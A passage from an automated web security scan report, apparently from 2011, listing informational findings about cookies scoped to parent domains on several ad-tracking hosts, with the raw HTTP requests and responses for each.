Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=OPENX&rurl=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed%26rtb%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; matchcontextweb=1; matchadbrite=1; matchyahoo=1; matchgoogle=1; matchopenx=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:54:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 01-Oct-13 23:54:02 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://r.openx.net/set?pid=6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed&rtb=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F
Via: 1.1 mdw061001 (MII-APC/2.1)
Content-Type: text/plain

13.78. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=-5675633421699857517= HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:56 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_218=4056--5675633421699857517=; domain=pubmatic.com; expires=Wed, 02-Oct-2013 01:52:56 GMT; path=/
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

13.79. http://images.hotelplanner.com/hotelimages/s/028000/028920A-thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.hotelplanner.com
Path:   /hotelimages/s/028000/028920A-thumb.jpg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotelimages/s/028000/028920A-thumb.jpg HTTP/1.1
Host: images.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:20 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: TLTSID=F123A950ED5310ED160FDD8181683406; Path=/; Domain=.hotelplanner.com
Set-Cookie: TLTUID=F123A950ED5310ED160FDD8181683406; Path=/; Domain=.hotelplanner.com; Expires=Mon, 03-10-2021 00:09:20 GMT
HostName: TWEB10
Last-Modified: Fri, 23 Sep 2011 05:06:00 GMT
ETag: "857-c3e25e00"
Accept-Ranges: bytes
Content-Length: 2135
Content-Type: image/jpeg

......JFIF.....H.H.....C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......F.F.."..............................
...[SNIP]...
13.80. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=219&fmt=redir&sec=0&pid=search2&type=Hotels&u1=&u2=Boston&u3=10/09/2011&u4=10/16/2011&u5=7&u6=&u7=S250&u8=B260711&u9=&u10=&u11=Boston+Logan+Intl.+%28BOS%29&u12=&u13=1&u14=MA&u15=US&OrderID=1317602253983&OrderValue= HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317602303729_239168105_as3104_imp|194#1317602303729_239168105_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p194r=b$u-98#5.8Qp|i-tracking#..1.8Qp.1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p219r=b$u-77#A.8Qp|i-H!FaxnS5xi!8TG!8Vy!IJ3~#1.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:41:22 GMT; Path=/
Set-Cookie: imp=a$le#1317602482047_282671641_ap3100_int|194#1317602303729_239168105_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:41:22 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 00:41:21 GMT
Connection: close

GIF89a.............!.......,...........D..;
13.81. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317384286603_272223897_ap3103_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p270r=b$u-7#A.8Qp|i-1643195#2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/
Set-Cookie: imp=a$le#1317600624289_282559054_ap3100_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 352
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

<html><head></head><body>
<img src="http://bp.specificclick.net?pixid=99013083" width="1" height="1" /><img src="http://ads.bluelithium.com/pixel?id=1027970&t=2" width="1" height="1" /><img src="http
...[SNIP]...
13.82. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[504]&betq=9669=409042[504] HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 00:09:02 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 03 Oct 2011 01:09:02 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
13.83. http://leadback.hotwire.db.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.hotwire.db.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=airsearch_cs=1&betq=12047=428151&xbetq=view=hs^NA^Boston^10-09^10-16 HTTP/1.1
Host: leadback.hotwire.db.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:41:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 00:41:25 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
13.84. http://lm.trafficmp.com/clicksense/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lm.trafficmp.com
Path:   /clicksense/pixel

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/pixel?id=105935&t=i HTTP/1.1
Host: lm.trafficmp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4fae74084-d4c4-4986-af20-d7ce71839597-gs1x0mwv; naiopt=out

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:41:31 GMT
Expires: Mon, 03 Oct 2011 00:41:31 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh18/127.0.0.1
Set-Cookie: T_7te4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d3c6=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 2=3_7CU_i48Lo; Domain=.trafficmp.com; Expires=Tue, 02-Oct-2012 00:41:31 GMT; Path=/
Set-Cookie: 8=00000000000; Domain=.trafficmp.com; Expires=Sat, 01-Oct-2016 00:41:31 GMT; Path=/
Accept-Ranges: bytes
Last-Modified: Fri, 23 Sep 2011 14:41:54 GMT
Content-Type: image/png
Content-Length: 123
Connection: close

.PNG
.
...IHDR.....................sRGB........    pHYs..........+......tIME.....0/D..O...IDAT..c````......^.*:....IEND.B`.
13.85. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=204&g=071&j=0&buid=55785307-A5DC-4E3A-B452-DDBD426D3A1D HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBdNIFeTpB4DyNcunZpvHtiAknq4xrBOagUqY2Fs1PrIIICh6en6ZHqSEtI7cSncSu2hmZ51F41%252Fd1z61oX7Lwbhg%253D%253D

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: EVX=deleted; expires=Sun, 03-Oct-2010 00:09:45 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 03-Oct-2010 00:09:45 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDK0qi62MrBSUrJOBLEzrQysi60MLayUDM2NzeLN440MTOINzA3jDeINlaxrawFA5Qzi; expires=Tue, 31-Jan-2012 00:09:46 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 03 Oct 2011 00:09:46 GMT
Server: HTTP server

13.86. http://m.xp1.ru4.com/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?_o=1807966&_t=17210472&_c=17210403&_b=17210472&ssv_c2=Y&ssv_b=c2&ssv_1=285445478 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/AVE/iview/285445478/direct;wi.728;hi.90/01/yAeNjx,bhirWmWzqkjb?click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d111781%26AdID%3d150102%26TargetID%3d9683%26Values%3d215%26Redirect%3d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17210403-B17210472=4|17210475|0|0|0|17210466|17226288|-1; domain=.ru4.com; path=/
Cache-control: private, no-cache, must-revalidate
Content-type: image/gif
Content-length: 43
X-Cnection: close

GIF89a.............!.......,...........D..;
13.87. http://m.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; domain=.ru4.com; path=/
Location: http://adadvisor.net/adscores/g.pixel?sid=9297587126
Content-length: 0
X-Cnection: close

13.88. http://m.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=tg&ssv_tg_1=&ssv_tg_2=&ssv_tg_3=000&ssv_tg_4=&ssv_duid=&ssv_tg_5=0&ssv_tg_6=0&ssv_tg_7=0&ssv_tg_8=k23-0,k24-0,k25-0,k26-0,k28-0,k29-0,k30-0,k31-0,k32-0,k33-0,k34-0,k35-0,k36-0 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:20 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 66281-B66290=3|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
X-Cnection: close

13.89. http://m.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=dx&ssv_duid=&ssv_dx_1=&ssv_dx_2=&ssv_dx_3= HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1; 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; 17210403-B17210472=4|17210475|0|0|0|17210466|17226288|-1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:13:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 90514-B90519=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
X-Cnection: close

13.90. http://o-va1.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfG0LluyTuhmTAJwT3iYRqhyPr7vh5Cg HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:12:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
